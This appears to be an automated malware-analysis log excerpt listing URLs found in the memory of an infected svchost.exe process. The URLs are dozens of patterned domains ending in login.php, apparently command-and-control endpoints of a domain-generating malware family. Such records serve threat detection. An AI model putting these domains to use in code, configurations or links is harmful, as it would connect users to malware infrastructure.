Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2448296733.000000000B4EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujycyp.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352433999.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1896515314.000000000B448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujydag.com/login.php
Source: svchost.exe, 00000002.00000003.2576508233.000000000B411000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615882312.000000000B41C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2576724081.000000000B41B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujydap.com/http://ganykah.com/http://volygyt.com/http://pupyxuq.com/http://pupyxuq.com/
Source: svchost.exe, 00000002.00000003.2576508233.000000000B411000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615882312.000000000B41C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2576724081.000000000B41B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujydap.com/http://pupypil.com/
Source: svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619875207.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2130330367.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567335310.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619465827.000000000B538000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577016387.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599280642.00000000046FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599201022.00000000046FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593516239.00000000029A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujydap.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071373291.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2069506631.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyduv.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352846166.000000000B534000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2264867591.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796798404.00000000029CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2281905134.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1790177343.00000000066E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2266296927.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1797402976.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujygul.com/login.php
Source: svchost.exe, 00000002.00000003.2071373291.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031297551.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2046143782.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040854796.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425676866.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2029740954.000000000B4C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423195846.000000000B536000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyjup.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104503124.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095357907.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujylyv.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053649667.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2046143782.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujymel.com/login.php
Source: svchost.exe, 00000002.00000003.2088422532.0000000006677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473585967.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474118106.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080123231.000000000B403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujypal.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006802225.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2586584940.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2561052961.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujypup.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2404292160.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547005817.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560027172.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473745496.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2492823798.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003764256.000000000B4FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2007310582.000000000B4FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2528215560.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536096244.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2393294547.000000000B404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyteq.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473585967.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474118106.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090604412.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujytug.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006802225.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzybep.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450513652.00000000029E6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzybil.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzydal.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2448296733.000000000B4EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095357907.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080123231.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyduq.com/login.php
Source: svchost.exe, 00000002.00000003.2125900220.000000000B41B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzygyl.com/http://puzygyl.com/http://lymywad.com/H
Source: svchost.exe, 00000002.00000003.2577183287.00000000029C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2602500488.00000000066BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619072820.000000000B509000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577269587.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619465827.000000000B538000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615964782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577016387.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593876696.00000000029C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2133387023.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599201022.00000000046FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123452647.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2576944755.00000000066BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzygyl.com/login.php
Source: svchost.exe, 00000002.00000003.2577183287.00000000029C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593876696.00000000029C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzygyl.com/login.phpl
Source: svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2551144785.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2130330367.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557412147.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615964782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559852805.000000000B536000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyjov.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyjyg.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzymev.com/login.php
Source: svchost.exe, 00000002.00000003.2564959910.00000000066A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564961073.00000000066A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzymup.com/http://puzymup.com/H
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019860947.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998878428.000000000B523000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzypug.com/login.php
Source: svchost.exe, 00000002.00000003.1364657904.00000000066C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364746448.00000000066C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1357846659.00000000066C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364701124.00000000066C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzywel.com/
Source: svchost.exe, 00000002.00000003.1364657904.00000000066C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364746448.00000000066C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1357846659.00000000066C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364701124.00000000066C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzywel.com/P
Source: svchost.exe, 00000002.00000003.1364657904.00000000066C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364746448.00000000066C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1357846659.00000000066C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364701124.00000000066C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzywel.com/h
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095357907.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyxip.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006802225.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040854796.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006946749.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2393294547.000000000B404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyfav.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2448296733.000000000B4EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyhag.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyhuq.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899516782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899745892.0000000006677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebykap.com/login.php
Source: svchost.exe, 00000002.00000003.2071373291.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071802239.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064129589.0000000006676000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebykul.com/login.php
Source: svchost.exe, 00000002.00000003.2088422532.0000000006677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080123231.000000000B403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyniv.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebynyg.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064178580.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071756308.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyqeq.com/login.php
Source: svchost.exe, 00000002.00000003.2577183287.00000000029C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2130330367.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615964782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2145251441.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593876696.00000000029C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2602579791.00000000066DF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128851747.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599201022.00000000046FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593516239.00000000029A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575606390.00000000029BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyqig.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1896515314.000000000B448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyqil.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2282876167.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796798404.00000000029CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346145517.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1790177343.00000000066E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2265980241.00000000046F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2266296927.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1797402976.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyrev.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyrip.com/login.php
